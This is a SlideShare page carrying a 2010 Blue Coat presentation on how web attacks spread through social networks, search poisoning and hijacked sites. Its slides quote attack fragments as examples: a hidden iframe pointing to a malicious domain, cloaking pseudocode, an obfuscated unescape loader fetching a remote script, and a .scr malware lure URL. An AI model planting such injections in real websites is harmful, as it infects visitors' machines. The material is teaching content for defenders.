Soumettre la recherche
Mettre en ligne
2010-11 The Anatomy of a Web Attack
•
1 j'aime
•
3,378 vues
Raleigh ISSA
Suivre
2010-11 The Anatomy of a Web Attack by Dennis Pike, Systems Engineer, Bluecoat Systems
Lire moins
Lire la suite
Technologie
Signaler
Partager
Signaler
Partager
1 sur 23
Télécharger maintenant
Télécharger pour lire hors ligne
Recommandé
Free website analysis at snoopstat.com
Free website analysis at snoopstat.com
MohammadSaifulIslam45
iStrategy London - The future of SEO is Content, Social and PPC Mark Iremonge...
iStrategy London - The future of SEO is Content, Social and PPC Mark Iremonge...
iStrategy
iCrossing UK: The Future of SEO is Content, Social and PPC
iCrossing UK: The Future of SEO is Content, Social and PPC
iCrossing
12.10.09 Lumen & CEMA Webinar: Leveraging Social Media to Drive Better Attend...
12.10.09 Lumen & CEMA Webinar: Leveraging Social Media to Drive Better Attend...
Lumen Consulting
Getting Social
Getting Social
MatrixMediaFX
5 Key Questions to answer: Are social recommendation the new Social Media Cur...
5 Key Questions to answer: Are social recommendation the new Social Media Cur...
Markus Kucborski
Exhibitor2010 Lumen Consulting Leveraging Social Media To Drive Better Engage...
Exhibitor2010 Lumen Consulting Leveraging Social Media To Drive Better Engage...
Lumen Consulting
Shepherding client & brand reputations: crisis management using social media
Shepherding client & brand reputations: crisis management using social media
Shael Sharma
Recommandé
Free website analysis at snoopstat.com
Free website analysis at snoopstat.com
MohammadSaifulIslam45
iStrategy London - The future of SEO is Content, Social and PPC Mark Iremonge...
iStrategy London - The future of SEO is Content, Social and PPC Mark Iremonge...
iStrategy
iCrossing UK: The Future of SEO is Content, Social and PPC
iCrossing UK: The Future of SEO is Content, Social and PPC
iCrossing
12.10.09 Lumen & CEMA Webinar: Leveraging Social Media to Drive Better Attend...
12.10.09 Lumen & CEMA Webinar: Leveraging Social Media to Drive Better Attend...
Lumen Consulting
Getting Social
Getting Social
MatrixMediaFX
5 Key Questions to answer: Are social recommendation the new Social Media Cur...
5 Key Questions to answer: Are social recommendation the new Social Media Cur...
Markus Kucborski
Exhibitor2010 Lumen Consulting Leveraging Social Media To Drive Better Engage...
Exhibitor2010 Lumen Consulting Leveraging Social Media To Drive Better Engage...
Lumen Consulting
Shepherding client & brand reputations: crisis management using social media
Shepherding client & brand reputations: crisis management using social media
Shael Sharma
Securing the Human (人を守るセキュリティ)
Securing the Human (人を守るセキュリティ)
itforum-roundtable
Infoblox Cloud Solutions - Cisco Mid-Atlantic User Group
Infoblox Cloud Solutions - Cisco Mid-Atlantic User Group
NetCraftsmen
Bluecoat Services
Bluecoat Services
ChessBall
Top 5 Reasons To Consider SolarWinds IPAM Over Infoblox
Top 5 Reasons To Consider SolarWinds IPAM Over Infoblox
SolarWinds
DNS Security Threats and Solutions
DNS Security Threats and Solutions
InnoTech
Infoblox Secure DNS Solution
Infoblox Secure DNS Solution
Srikrupa Srivatsan
Cyber crime v3
Cyber crime v3
Jamison Utter
Cómo mejorar la seguridad de los servicios de DNS, DHCP e IPAM
Cómo mejorar la seguridad de los servicios de DNS, DHCP e IPAM
Mundo Contact
Content Analysis System and Advanced Threat Protection
Content Analysis System and Advanced Threat Protection
Blue Coat
Advanced Threat Protection - Sandboxing 101
Advanced Threat Protection - Sandboxing 101
Blue Coat
Advanced DNS Protection
Advanced DNS Protection
Srikrupa Srivatsan
DNS Security Presentation ISSA
DNS Security Presentation ISSA
Srikrupa Srivatsan
Informe @CVenturaCAT elaborat per @SocialBro 9 d'Octubre de 2012
Informe @CVenturaCAT elaborat per @SocialBro 9 d'Octubre de 2012
Carles Ventura
Risk and reward 220410
Risk and reward 220410
TWO Social
Free lowcost dec2010
Free lowcost dec2010
Highway T
Risk & Reward in Social Media
Risk & Reward in Social Media
Richard Spencer
Risk & Reward In Social Media
Risk & Reward In Social Media
TWO Social
Riskrewardinsocialmedia
Riskrewardinsocialmedia
Jimi1032
Measuring adblockers impact on site performance
Measuring adblockers impact on site performance
Karan Kumar
Creating Value In Social Networking
Creating Value In Social Networking
Lars Trieloff
Panda vs Penguin Presentation
Panda vs Penguin Presentation
Aman Talwar
RioInfo 2007 - Tecnologias Centradas no Usuário
RioInfo 2007 - Tecnologias Centradas no Usuário
Manoel Lemos
Contenu connexe
En vedette
Securing the Human (人を守るセキュリティ)
Securing the Human (人を守るセキュリティ)
itforum-roundtable
Infoblox Cloud Solutions - Cisco Mid-Atlantic User Group
Infoblox Cloud Solutions - Cisco Mid-Atlantic User Group
NetCraftsmen
Bluecoat Services
Bluecoat Services
ChessBall
Top 5 Reasons To Consider SolarWinds IPAM Over Infoblox
Top 5 Reasons To Consider SolarWinds IPAM Over Infoblox
SolarWinds
DNS Security Threats and Solutions
DNS Security Threats and Solutions
InnoTech
Infoblox Secure DNS Solution
Infoblox Secure DNS Solution
Srikrupa Srivatsan
Cyber crime v3
Cyber crime v3
Jamison Utter
Cómo mejorar la seguridad de los servicios de DNS, DHCP e IPAM
Cómo mejorar la seguridad de los servicios de DNS, DHCP e IPAM
Mundo Contact
Content Analysis System and Advanced Threat Protection
Content Analysis System and Advanced Threat Protection
Blue Coat
Advanced Threat Protection - Sandboxing 101
Advanced Threat Protection - Sandboxing 101
Blue Coat
Advanced DNS Protection
Advanced DNS Protection
Srikrupa Srivatsan
DNS Security Presentation ISSA
DNS Security Presentation ISSA
Srikrupa Srivatsan
En vedette
(12)
Securing the Human (人を守るセキュリティ)
Securing the Human (人を守るセキュリティ)
Infoblox Cloud Solutions - Cisco Mid-Atlantic User Group
Infoblox Cloud Solutions - Cisco Mid-Atlantic User Group
Bluecoat Services
Bluecoat Services
Top 5 Reasons To Consider SolarWinds IPAM Over Infoblox
Top 5 Reasons To Consider SolarWinds IPAM Over Infoblox
DNS Security Threats and Solutions
DNS Security Threats and Solutions
Infoblox Secure DNS Solution
Infoblox Secure DNS Solution
Cyber crime v3
Cyber crime v3
Cómo mejorar la seguridad de los servicios de DNS, DHCP e IPAM
Cómo mejorar la seguridad de los servicios de DNS, DHCP e IPAM
Content Analysis System and Advanced Threat Protection
Content Analysis System and Advanced Threat Protection
Advanced Threat Protection - Sandboxing 101
Advanced Threat Protection - Sandboxing 101
Advanced DNS Protection
Advanced DNS Protection
DNS Security Presentation ISSA
DNS Security Presentation ISSA
Similaire à 2010-11 The Anatomy of a Web Attack
Informe @CVenturaCAT elaborat per @SocialBro 9 d'Octubre de 2012
Informe @CVenturaCAT elaborat per @SocialBro 9 d'Octubre de 2012
Carles Ventura
Risk and reward 220410
Risk and reward 220410
TWO Social
Free lowcost dec2010
Free lowcost dec2010
Highway T
Risk & Reward in Social Media
Risk & Reward in Social Media
Richard Spencer
Risk & Reward In Social Media
Risk & Reward In Social Media
TWO Social
Riskrewardinsocialmedia
Riskrewardinsocialmedia
Jimi1032
Measuring adblockers impact on site performance
Measuring adblockers impact on site performance
Karan Kumar
Creating Value In Social Networking
Creating Value In Social Networking
Lars Trieloff
Panda vs Penguin Presentation
Panda vs Penguin Presentation
Aman Talwar
RioInfo 2007 - Tecnologias Centradas no Usuário
RioInfo 2007 - Tecnologias Centradas no Usuário
Manoel Lemos
Moodle Series - Learn Local - Embedding in Moodle
Moodle Series - Learn Local - Embedding in Moodle
Yum Studio
Make useof file-sharing
Make useof file-sharing
wilkmjw
Web 2.0 for Educators
Web 2.0 for Educators
Fleep Tuque
Creative Commons and Free Stuff to Spice Up Your Training
Creative Commons and Free Stuff to Spice Up Your Training
Michelle Lentz
Why Portability matters (full presentation)
Why Portability matters (full presentation)
Ian Forrester
Semantic Web: In Quest for the Next Generation Killer Apps
Semantic Web: In Quest for the Next Generation Killer Apps
Jie Bao
Technology lal
Technology lal
Heidi Dusek
USING SOCIAL MEDIA IN YOUR COMMUNICATION STRATEGIES
USING SOCIAL MEDIA IN YOUR COMMUNICATION STRATEGIES
tudorwilliams
Mobile Contents
Mobile Contents
driver86
10 Things You Probably Didn't Know About Plone
10 Things You Probably Didn't Know About Plone
Jazkarta, Inc.
Similaire à 2010-11 The Anatomy of a Web Attack
(20)
Informe @CVenturaCAT elaborat per @SocialBro 9 d'Octubre de 2012
Informe @CVenturaCAT elaborat per @SocialBro 9 d'Octubre de 2012
Risk and reward 220410
Risk and reward 220410
Free lowcost dec2010
Free lowcost dec2010
Risk & Reward in Social Media
Risk & Reward in Social Media
Risk & Reward In Social Media
Risk & Reward In Social Media
Riskrewardinsocialmedia
Riskrewardinsocialmedia
Measuring adblockers impact on site performance
Measuring adblockers impact on site performance
Creating Value In Social Networking
Creating Value In Social Networking
Panda vs Penguin Presentation
Panda vs Penguin Presentation
RioInfo 2007 - Tecnologias Centradas no Usuário
RioInfo 2007 - Tecnologias Centradas no Usuário
Moodle Series - Learn Local - Embedding in Moodle
Moodle Series - Learn Local - Embedding in Moodle
Make useof file-sharing
Make useof file-sharing
Web 2.0 for Educators
Web 2.0 for Educators
Creative Commons and Free Stuff to Spice Up Your Training
Creative Commons and Free Stuff to Spice Up Your Training
Why Portability matters (full presentation)
Why Portability matters (full presentation)
Semantic Web: In Quest for the Next Generation Killer Apps
Semantic Web: In Quest for the Next Generation Killer Apps
Technology lal
Technology lal
USING SOCIAL MEDIA IN YOUR COMMUNICATION STRATEGIES
USING SOCIAL MEDIA IN YOUR COMMUNICATION STRATEGIES
Mobile Contents
Mobile Contents
10 Things You Probably Didn't Know About Plone
10 Things You Probably Didn't Know About Plone
Plus de Raleigh ISSA
Raleigh issa chapter updates-slides-2014-9
Raleigh issa chapter updates-slides-2014-9
Raleigh ISSA
Raleigh issa chapter updates-slides-2014-8
Raleigh issa chapter updates-slides-2014-8
Raleigh ISSA
Raleigh issa chapter updates-slides-2014-7
Raleigh issa chapter updates-slides-2014-7
Raleigh ISSA
Raleigh issa chapter updates-slides-2014-6
Raleigh issa chapter updates-slides-2014-6
Raleigh ISSA
Managing privileged account security
Managing privileged account security
Raleigh ISSA
A10 issa d do s 5-2014
A10 issa d do s 5-2014
Raleigh ISSA
Raleigh issa chapter april meeting - managing a security & privacy governan...
Raleigh issa chapter april meeting - managing a security & privacy governan...
Raleigh ISSA
April 2014 Raleigh ISSA chapter update slides
April 2014 Raleigh ISSA chapter update slides
Raleigh ISSA
March 2014 B2B - Breaking into info sec
March 2014 B2B - Breaking into info sec
Raleigh ISSA
March 2014 Raleigh ISSA chapter update slides
March 2014 Raleigh ISSA chapter update slides
Raleigh ISSA
February 2014 Raleigh Chapter ISSA Board update slides
February 2014 Raleigh Chapter ISSA Board update slides
Raleigh ISSA
2014-01 Raleigh ISSA Chapter Updates January 2014
2014-01 Raleigh ISSA Chapter Updates January 2014
Raleigh ISSA
Growing trend of finding2013-11 Growing Trend of Finding Regulatory and Tort ...
Growing trend of finding2013-11 Growing Trend of Finding Regulatory and Tort ...
Raleigh ISSA
2013-11 Raleigh ISSA Chapter Updates November 2013
2013-11 Raleigh ISSA Chapter Updates November 2013
Raleigh ISSA
2013-10 Raleigh ISSA Chapter Updates October 2013
2013-10 Raleigh ISSA Chapter Updates October 2013
Raleigh ISSA
2013-09 Raleigh ISSA Chapter Updates September 2013
2013-09 Raleigh ISSA Chapter Updates September 2013
Raleigh ISSA
2013-08 Raleigh ISSA Chapter Updates August 2013
2013-08 Raleigh ISSA Chapter Updates August 2013
Raleigh ISSA
2013-07 How to Win with Customers - Keith Pigues
2013-07 How to Win with Customers - Keith Pigues
Raleigh ISSA
2013-07 Raleigh ISSA Chapter Updates July 2013
2013-07 Raleigh ISSA Chapter Updates July 2013
Raleigh ISSA
2013-06 Raleigh ISSA Chapter Updates June 2013
2013-06 Raleigh ISSA Chapter Updates June 2013
Raleigh ISSA
Plus de Raleigh ISSA
(20)
Raleigh issa chapter updates-slides-2014-9
Raleigh issa chapter updates-slides-2014-9
Raleigh issa chapter updates-slides-2014-8
Raleigh issa chapter updates-slides-2014-8
Raleigh issa chapter updates-slides-2014-7
Raleigh issa chapter updates-slides-2014-7
Raleigh issa chapter updates-slides-2014-6
Raleigh issa chapter updates-slides-2014-6
Managing privileged account security
Managing privileged account security
A10 issa d do s 5-2014
A10 issa d do s 5-2014
Raleigh issa chapter april meeting - managing a security & privacy governan...
Raleigh issa chapter april meeting - managing a security & privacy governan...
April 2014 Raleigh ISSA chapter update slides
April 2014 Raleigh ISSA chapter update slides
March 2014 B2B - Breaking into info sec
March 2014 B2B - Breaking into info sec
March 2014 Raleigh ISSA chapter update slides
March 2014 Raleigh ISSA chapter update slides
February 2014 Raleigh Chapter ISSA Board update slides
February 2014 Raleigh Chapter ISSA Board update slides
2014-01 Raleigh ISSA Chapter Updates January 2014
2014-01 Raleigh ISSA Chapter Updates January 2014
Growing trend of finding2013-11 Growing Trend of Finding Regulatory and Tort ...
Growing trend of finding2013-11 Growing Trend of Finding Regulatory and Tort ...
2013-11 Raleigh ISSA Chapter Updates November 2013
2013-11 Raleigh ISSA Chapter Updates November 2013
2013-10 Raleigh ISSA Chapter Updates October 2013
2013-10 Raleigh ISSA Chapter Updates October 2013
2013-09 Raleigh ISSA Chapter Updates September 2013
2013-09 Raleigh ISSA Chapter Updates September 2013
2013-08 Raleigh ISSA Chapter Updates August 2013
2013-08 Raleigh ISSA Chapter Updates August 2013
2013-07 How to Win with Customers - Keith Pigues
2013-07 How to Win with Customers - Keith Pigues
2013-07 Raleigh ISSA Chapter Updates July 2013
2013-07 Raleigh ISSA Chapter Updates July 2013
2013-06 Raleigh ISSA Chapter Updates June 2013
2013-06 Raleigh ISSA Chapter Updates June 2013
Dernier
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
The Digital Insurer
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Principled Technologies
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
Martijn de Jong
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
Anna Loughnan Colquhoun
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024
SynarionITSolutions
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
Radu Cotescu
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
Remote DBA Services
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
apidays
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
Boston Institute of Analytics
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
RTylerCroy
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
The Digital Insurer
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
Product Anonymous
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
apidays
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
ThousandEyes
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
MIND CTI
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Roshan Dwivedi
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
apidays
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
Gabriella Davis
Dernier
(20)
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
2010-11 The Anatomy of a Web Attack
1.
The Anatomy of
a Web Attack Dennis Pike Systems Engineer Geo Specialists Lead – Americas Security dennis.pike@bluecoat.com Blue Coat Systems Confidential Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered in certain jurisdictions. All other product or service names are the property of their respective owners. © Blue Coat Systems, Inc. 2010. All Rights Reserved.
2.
Agenda
State of the Web • Top categories • Top attacks The Anatomy of a Web Attack • Lures to web threats • Examples Dynamic Link Analysis 2 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
3.
Best of the
Worst Top Web Category? >> Among the top ten active categories of 2009, social networking access accounted for 25 percent of all Web access activity Top Web threat? >> Fake Antivirus was the most successful Web threat in 2009, followed by the Fake Video Codec offer. >>New Fake AV installer programs increased from an average of 300 to 1,462 per day in the second half of 2009. * >>Average lifetime of sites that redirect users to Web pages that try to install scareware decreased with a median lifetime dropping below 100 hours around April 2009, below 10 hours around September 2009, and below one hour since January 2010. * *Google Inc. 3 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
4.
Email vs Social
Networking Do more people use email or social networking sites? >> According to Nielsen Co., in August 2009, 277 million people used email across the U.S., several European countries, Brazil and Australia, a 21 percent increase from the year before. But the number of users on social networking and other community sites jumped 31 percent to 302 million, bypassing the email user population by 10 percent. 4 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
5.
Domain:
Client% Domain: Client% Noteworthy Items ~Total~: youtube.com: 100% 35.7800 ~Total~: youtube.com: 100.00% 36.28 hotfile.com: 7.427 rapidshare.com: 6.36 Argument for Video (HTTP and Streaming) apple.com: 4.901 hotfile.com: 5.26 ninjacloak.com: 4.205 apple.com: 3.98 rapidshare.com: 4.135 ninjacloak.com: 3.97 megaupload.com: 2.977 megaupload.com: 2.54 googlevideo.com: 2.66 googlevideo.com: 2.33 fbcdn.net: 1.791 fbcdn.net: 1.85 mediafire.com: 1.492 fileserve.com: 1.75 windowsupdate.com: 1.305 playstation.net: 1.74 playstation.net: 1.241 mediafire.com: 1.68 fileserve.com: 1.187 windowsupdate.com: 1.42 4shared.com: 1.031 zshare.net: 0.78 zshare.net: 0.7793 facebook.com: 0.65 dailymotion.com: 0.6476 dailymotion.com: 0.62 google.com: 0.588 4shared.com: 0.6 facebook.com: 0.5764 novamov.com: 0.54 novamov.com: 0.5737 google.com: 0.54 microsoft.com: 0.4747 farmville.com: 0.52 farmville.com: 0.4626 adobe.com: 0.41 video filesharing © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
6.
Changing Web Habits
Top 10 Categories – 2009 Social Networking WebFilter/WebPulse, 62M+ Users Moved to #1 from #2 position 1. Social Networking Represents 25% of Top10 requests 2. Web Advertisements 3. Search Engines/Portals Web Email 4. Personals/Dating Dropped to #9 from #5 position 5. Pornography Users migrating to social networking 6. Computers/Internet 7. Audio/Video Clips 8. Adult/Mature Content Cyber Crime Leverages 9. Web Email Search engine poisoning 10. Illegal/Questionable Fake AV and Codec updates Popular site injections Death, Drama & Disaster lures Health & Wealth scams 6 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
7.
Web Threats Rising
Exponentially 2/3 of all known malicious code threats in 1 year (Symantec April’09) 1 in 150 Webpages infected in 2009 vs. 1 in 20,000 in 2006 (Kaspersky) 7 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
8.
Distribution Power
Botnet computing power to: Pitch worthless products Hijack online banking accounts Top 5 Steal corporate data Botnets in 2009 Botnet Zeus Koobface B Koobface D Monkif A Clickbot Peak 1,070,000 number 812,000 599,000 of active 506,000 bots 375,000 How it spreads Search Results Facebook Twitter Social Networking USA TODAY Research – March 2010 8 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
9.
An Invitation to
Crime 2 – Program messages user’s friends asking 3 – Anyone who clicks them to click on a link on the link is asked to to a photo or video. enable a media player needed to see the images. Running the file turns the PC into 1 – An automated a bot. program logs on to social network using stolen user 4 – The bot steals the PC credentials. owners logon credentials, starting the cycle again. USA TODAY Research – March 2010 9 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
10.
Web Evolution
Static Pages Dynamic Pages Dynamic Pages Interactive Pages Publishing Model Community Model Single Host Pages Multi-Host Pages Nice to Have Must Have 10 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
11.
Multi-Host Pages
SPORT 6 Domains 13 Hosts 147 Requests 504 KB 14.5 Seconds 11 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
12.
Paths to Malware
Infection Link Farms Infected Site Search Engine Blogs, Forums Relay Bait Malware 12 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
13.
End User…Infected Site
www.inka.com <html> … <iframesrc="http://ho menameregistration. cn/in.cgi?income12" width=1 height=1 style="visibility: homenameregistration.cn/in.cgi?income12 hidden"></iframe><d iv id=“header”> … </html> 13 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
14.
Web 2.0 and
Search Engines Forums Blogs Search Wikis WWW Engine View Guestbooks 14 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
15.
Web 2.0 and
Search Engines Links… Links… Links… Links… Links… Links… Search WWW Engine Words… View Words… Words… Links… Links… Links… 15 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
16.
16
© Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
17.
17
© Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
18.
Hijacked Website
if (“search engine”) { xdesignstudios.com echo “…indexable content…” } else { echo “<body><script src="live.js"></script>” dir1 } index.php … id=fall+printable+coloring+pages id=free+printable+easter+drawings id=disney+printable+cartoon+characters id=free+printable+halloween+sheets id=girls+free+printable+organizer id=in+store+printable+catherines+coupons … live.js 18 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
19.
End User…Search Engine
Redirect index.php?id=hannah-montana-printable-birthday-invitations <body> <script src="live.js"> </script> document.write(unes live.js cape('%3C%53%43 %52%49%50%54% 20%20%20%20%6C %61%6E%67%75… http://cracksinside.com/red/gen.js 19 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
20.
What just happened?
Links… Links… Links… Links… Links… Links… Search WWW Engine Words… View Words… Words… Links… Links… Links… Redirect 20 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
21.
Recent Examples -
VBMania www.sharedocuments.com/library/PDF_Document21.025542010.pdf Email text www.sharedocument s.com/library/PDF_D ocument21.0255420 10.pdf members.multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr 21 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
22.
Recent Examples –
Fake Warez 22 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
23.
© Blue Coat
Systems, Inc. 2010. All Rights Reserved.
Télécharger maintenant